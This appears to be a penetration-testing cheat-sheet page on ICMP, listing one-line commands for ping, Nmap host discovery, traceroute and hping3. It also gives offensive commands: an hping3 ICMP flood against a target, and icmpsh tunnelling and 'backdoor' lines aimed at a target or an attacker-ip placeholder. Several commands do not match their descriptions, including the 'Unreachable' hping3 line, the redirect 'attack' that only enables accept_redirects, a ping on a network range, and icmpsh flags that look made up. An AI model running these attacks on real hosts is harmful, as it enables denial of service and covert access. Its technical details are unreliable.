Skip to main content

ICMP (Internet Control Message Protocol)

Default Port: Not applicable

ICMP (Internet Control Message Protocol) is a network layer protocol used by network devices, including routers, to send error messages and operational information indicating success or failure when communicating with another IP address. It is commonly used for diagnostics and troubleshooting in IP networks.

ICMP operates by exchanging control messages between devices, informing them about network conditions, errors, and various other operational states.

Connect

Ping Utility

The ping command is used to send ICMP Echo Request messages to a target host:

ping <target-ip>

Recon

Identifying ICMP Responses

You can use Nmap to check if a target host responds to ICMP requests:

nmap -sn X.X.X.X

ICMP Unreachable Messages

Tools like hping3 can send custom ICMP Unreachable messages to test network reachability:

hping3 --icmp -1 X.X.X.X

Enumeration

ICMP Echo Requests

Enumerating live hosts on a network can be done using ICMP Echo Requests:

ping -c 1 <network-range>

ICMP Time Exceeded Messages

Using traceroute, you can trace the route packets take to a destination and identify routers along the path:

traceroute <target-ip>

Attack Vectors

ICMP Redirect Attacks

ICMP Redirect messages can be exploited to manipulate a host's routing table and redirect its traffic through an attacker-controlled device:

echo 1 > /proc/sys/net/ipv4/conf/all/accept_redirects

ICMP Flood Attacks

ICMP Flood attacks involve overwhelming a target host with a large volume of ICMP Echo Requests:

hping3 --flood --icmp <target-ip>

Post-Exploitation

Ping Sweep

After gaining access to a network, performing a ping sweep can help identify live hosts:

nmap -sn <network-range>

ICMP Tunneling

ICMP Tunneling involves encapsulating other network protocols within ICMP packets to bypass network security measures:

icmpsh -t <target-ip>

ICMP Backdoor

Creating a backdoor using ICMP can provide a covert channel for communication:

icmpsh -b <attacker-ip>